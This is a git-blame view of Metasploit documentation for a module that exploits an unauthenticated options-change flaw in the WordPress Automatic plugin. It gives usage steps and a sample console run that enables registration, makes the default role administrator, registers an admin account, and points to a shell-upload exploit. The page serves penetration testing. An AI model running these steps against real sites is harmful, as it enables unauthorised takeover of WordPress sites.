Files
metasploit-gs/documentation/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

60 lines
1.8 KiB
Markdown
Raw Normal View History

2021-10-17 13:04:38 -04:00
## Vulnerable Application
This module exploits an unauthenticated arbitrary wordpress options change vulnerability
2021-11-04 15:28:05 -04:00
in the Automatic (wp-automatic) plugin <= 3.53.2.
2021-10-17 13:04:38 -04:00
If `WPEMAIL` is provided, the administrator's email address will be changed.
User registration is enabled, and default user role is
set to administrator. A user is then created with the `USER` name set.
A valid `EMAIL` is required to get the registration email (not handled in MSF).
A vulnerable version of the plugin can be downloaded [here](https://legendblogs.com/wp-automatic-plugin-free-download)
## Verification Steps
1. Install the vulnerable plugin
1. Start msfconsole
2021-10-17 15:38:38 -04:00
1. Do: `use auxiliary/admin/http/wp_automatic_plugin_privesc`
1. Do: `set rhosts [IPs]`
1. Do: `set email [email address]`
2021-10-17 13:04:38 -04:00
1. Do: `run`
2021-10-17 15:38:38 -04:00
1. You should get an email to setup your new admin account.
2021-10-17 13:04:38 -04:00
## Options
### EMAIL
Email for registration. No default.
### USER
Username for registration, defaults to `msfuser`
### WPEMAIL
Wordpress Administration Email. No default.
## Scenarios
### wp-automatic 3.50.7 on Wordpress 5.4.4 No WPEMAIL
```
2021-10-17 15:38:38 -04:00
resource (automatic.rb)> use auxiliary/admin/http/wp_automatic_plugin_privesc
2021-10-17 13:04:38 -04:00
[*] Using auxiliary/admin/http/wp_automatic_plugin_privesc
resource (automatic.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (automatic.rb)> set verbose true
verbose => true
resource (automatic.rb)> set email fake@example.com
email => fake@example.com
resource (automatic.rb)> run
[*] Running module against 1.1.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
2021-10-21 17:25:14 -04:00
[*] Enabling user registrations...
[*] Setting the default user role type to administrator...
2021-10-17 13:04:38 -04:00
[*] Registering msfuser with email fake@example.com
[+] For a shell: use exploits/unix/webapp/wp_admin_shell_upload
[*] Auxiliary module execution completed
```